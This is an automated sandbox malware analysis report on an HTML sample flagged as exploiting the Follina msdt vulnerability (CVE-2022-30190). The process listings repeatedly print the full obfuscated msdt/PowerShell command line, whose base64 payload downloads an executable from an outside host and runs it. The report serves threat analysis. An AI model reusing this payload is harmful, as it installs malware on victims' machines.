Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1024203777.test.html

Overview

General Information

Sample Name:1024203777.test.html
Analysis ID:696527
MD5:c389f7ee1d9e6376b7d96e80d7a1ffe1
SHA1:2d0b931cf7cecddddb35457a5719353840f8ca66
SHA256:8a01945c5951b6685768c155d938e7805b097477fcbb7e815fcb1cc26f1170da
Tags:CVE-2022-30190Exploithtml
Infos:

Detection

Follina CVE-2022-30190
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
IP address seen in connection with other malware

Classification

  • System is w10x64
  • chrome.exe (PID: 2040 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 5872 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1936 --field-trial-handle=1700,i,9923033970500120582,12250861549093349672,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • msdt.exe (PID: 5908 cmdline: "C:\Windows\system32\msdt.exe" ms-msdt:/ID%20PCwdIAGnOSTic%20-skiP%20fOrce%20-PAraM%20%22It_rEbrOwsEForFILE=#7qnxE3%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=Aq$(iEX($(iEX('[SysTEm.TEXt.eNcOdinG]'+[chAr]58+[cHAr]58+'utF8.getstrING([sysTem.coNverT]'+[CHaR]0X3a+[ChAr]0X3A+'FRomBasE64sTrIng('+[cHAR]34+'c1RvUC1wck9jRXNzIC1mb3JDRSAtbmFNRSAnbXNkdCc7JEsgPSBhRGQtdFlwZSAtTUVtQmVSZGVGaU5JdGlPTiAnW0RsbEltcG9ydCgidVJsbW9OLkRMbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgZnFtLHN0cmluZyBELHN0cmluZyBFTyx1aW50IHVsLEludFB0ciB0KTsnIC1uYW1FICJ6IiAtbkFtRVNQYWNFIE0gLVBhc3NUaHJ1OyAkSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9ldmVudG9yZ2FuaXplci5way9uZXdiaXRoZXJlMjAwNTRyZmRzLmV4ZSIsIiRFTlY6QVBQREFUQVxBbnlOYW1lLmV4ZSIsMCwwKTtzdEFSdC1TbEVFcCgzKTtyVU5EbGwzMi5leEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkZU5WOkFQUERBVEFcQW55TmFtZS5leGUiO1NUT3AtUFJvQ2VzUyAtZk9yQ0UgLW5hTUUgJ3NkaWFnbmhvc3Qn'+[chAR]0x22+'))'))))Y/../../../../../../../../../../../.EXE%20%22 MD5: 8BE43BAF1F37DA5AB31A53CA1C07EE0C)
  • chrome.exe (PID: 6352 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\1024203777.test.html MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.752386452.000001ACCA230000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
    00000005.00000002.752780775.000001ACCA414000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      00000005.00000002.752409701.000001ACCA239000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 1024203777.test.htmlVirustotal: Detection: 10%Perma Link

        Exploits

        barindex
        Source: Yara matchFile source: 00000005.00000002.752386452.000001ACCA230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.752780775.000001ACCA414000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.752409701.000001ACCA239000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
        Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
        Source: unknownDNS traffic detected: queries for: clients2.google.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
        Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
        Source: 1024203777.test.htmlVirustotal: Detection: 10%
        Source: C:\Windows\System32\msdt.exeFile created: C:\Users\user\AppData\Local\Temp\msdtadminJump to behavior
        Source: C:\Windows\System32\msdt.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: classification engineClassification label: mal56.expl.winHTML@38/0@6/6
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1936 --field-trial-handle=1700,i,9923033970500120582,12250861549093349672,131072 /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\1024203777.test.html
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/ID%20PCwdIAGnOSTic%20-skiP%20fOrce%20-PAraM%20%22It_rEbrOwsEForFILE=#7qnxE3%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=Aq$(iEX($(iEX('[SysTEm.TEXt.eNcOdinG]'+[chAr]58+[cHAr]58+'utF8.getstrING([sysTem.coNverT]'+[CHaR]0X3a+[ChAr]0X3A+'FRomBasE64sTrIng('+[cHAR]34+'c1RvUC1wck9jRXNzIC1mb3JDRSAtbmFNRSAnbXNkdCc7JEsgPSBhRGQtdFlwZSAtTUVtQmVSZGVGaU5JdGlPTiAnW0RsbEltcG9ydCgidVJsbW9OLkRMbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgZnFtLHN0cmluZyBELHN0cmluZyBFTyx1aW50IHVsLEludFB0ciB0KTsnIC1uYW1FICJ6IiAtbkFtRVNQYWNFIE0gLVBhc3NUaHJ1OyAkSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9ldmVudG9yZ2FuaXplci5way9uZXdiaXRoZXJlMjAwNTRyZmRzLmV4ZSIsIiRFTlY6QVBQREFUQVxBbnlOYW1lLmV4ZSIsMCwwKTtzdEFSdC1TbEVFcCgzKTtyVU5EbGwzMi5leEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkZU5WOkFQUERBVEFcQW55TmFtZS5leGUiO1NUT3AtUFJvQ2VzUyAtZk9yQ0UgLW5hTUUgJ3NkaWFnbmhvc3Qn'+[chAR]0x22+'))'))))Y/../../../../../../../../../../../.EXE%20%22
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1936 --field-trial-handle=1700,i,9923033970500120582,12250861549093349672,131072 /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/ID%20PCwdIAGnOSTic%20-skiP%20fOrce%20-PAraM%20%22It_rEbrOwsEForFILE=#7qnxE3%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=Aq$(iEX($(iEX('[SysTEm.TEXt.eNcOdinG]'+[chAr]58+[cHAr]58+'utF8.getstrING([sysTem.coNverT]'+[CHaR]0X3a+[ChAr]0X3A+'FRomBasE64sTrIng('+[cHAR]34+'c1RvUC1wck9jRXNzIC1mb3JDRSAtbmFNRSAnbXNkdCc7JEsgPSBhRGQtdFlwZSAtTUVtQmVSZGVGaU5JdGlPTiAnW0RsbEltcG9ydCgidVJsbW9OLkRMbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgZnFtLHN0cmluZyBELHN0cmluZyBFTyx1aW50IHVsLEludFB0ciB0KTsnIC1uYW1FICJ6IiAtbkFtRVNQYWNFIE0gLVBhc3NUaHJ1OyAkSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9ldmVudG9yZ2FuaXplci5way9uZXdiaXRoZXJlMjAwNTRyZmRzLmV4ZSIsIiRFTlY6QVBQREFUQVxBbnlOYW1lLmV4ZSIsMCwwKTtzdEFSdC1TbEVFcCgzKTtyVU5EbGwzMi5leEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkZU5WOkFQUERBVEFcQW55TmFtZS5leGUiO1NUT3AtUFJvQ2VzUyAtZk9yQ0UgLW5hTUUgJ3NkaWFnbmhvc3Qn'+[chAR]0x22+'))'))))Y/../../../../../../../../../../../.EXE%20%22Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\GoogleUpdaterJump to behavior
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeFile opened: C:\Windows\system32\MSFTEDIT.DLLJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
        Source: C:\Windows\System32\msdt.exeWindow / User API: threadDelayed 2612Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "c:\windows\system32\msdt.exe" ms-msdt:/id%20pcwdiagnostic%20-skip%20force%20-param%20%22it_rebrowseforfile=#7qnxe3%20it_launchmethod=contextmenu%20it_browseforfile=aq$(iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'c1rvuc1wck9jrxnzic1mb3jdrsatbmfnrsanbxnkdcc7jesgpsbhrgqtdflwzsattuvtqmvszgvgau5jdglptianw0rsbeltcg9ydcgidvjsbw9olkrmbcisienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigznftlhn0cmluzybelhn0cmluzybftyx1aw50ihvsleludfb0cib0ktsnic1uyw1ficj6iiatbkftrvnqywnfie0glvbhc3nuahj1oyakszo6vvjmrg93bmxvywrub0zpbguomcwiahr0chm6ly9ldmvudg9yz2fuaxplci5way9uzxdiaxrozxjlmjawntryzmrzlmv4zsisiirftly6qvbqrefuqvxbbnloyw1llmv4zsismcwwkttzdefsdc1tbevfccgzkttyvu5ebgwzmi5leeugemlwzmxkci5kbgwsum91dgvuagvdywxsicikzu5wokfquerbvefcqw55tmftzs5leguio1nut3atufjvq2vzuyatzk9yq0uglw5htuugj3nkawfnbmhvc3qn'+[char]0x22+'))'))))y/../../../../../../../../../../../.exe%20%22
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "c:\windows\system32\msdt.exe" ms-msdt:/id%20pcwdiagnostic%20-skip%20force%20-param%20%22it_rebrowseforfile=#7qnxe3%20it_launchmethod=contextmenu%20it_browseforfile=aq$(iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'c1rvuc1wck9jrxnzic1mb3jdrsatbmfnrsanbxnkdcc7jesgpsbhrgqtdflwzsattuvtqmvszgvgau5jdglptianw0rsbeltcg9ydcgidvjsbw9olkrmbcisienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigznftlhn0cmluzybelhn0cmluzybftyx1aw50ihvsleludfb0cib0ktsnic1uyw1ficj6iiatbkftrvnqywnfie0glvbhc3nuahj1oyakszo6vvjmrg93bmxvywrub0zpbguomcwiahr0chm6ly9ldmvudg9yz2fuaxplci5way9uzxdiaxrozxjlmjawntryzmrzlmv4zsisiirftly6qvbqrefuqvxbbnloyw1llmv4zsismcwwkttzdefsdc1tbevfccgzkttyvu5ebgwzmi5leeugemlwzmxkci5kbgwsum91dgvuagvdywxsicikzu5wokfquerbvefcqw55tmftzs5leguio1nut3atufjvq2vzuyatzk9yq0uglw5htuugj3nkawfnbmhvc3qn'+[char]0x22+'))'))))y/../../../../../../../../../../../.exe%20%22Jump to behavior
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Command and Scripting Interpreter
        Path Interception1
        Process Injection
        2
        Masquerading
        OS Credential Dumping1
        Application Window Discovery
        Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
        Encrypted Channel
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Process Injection
        LSASS Memory1
        System Information Discovery
        Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
        Non-Application Layer Protocol
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
        Application Layer Protocol
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer1
        Ingress Tool Transfer
        SIM Card SwapCarrier Billing Fraud
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET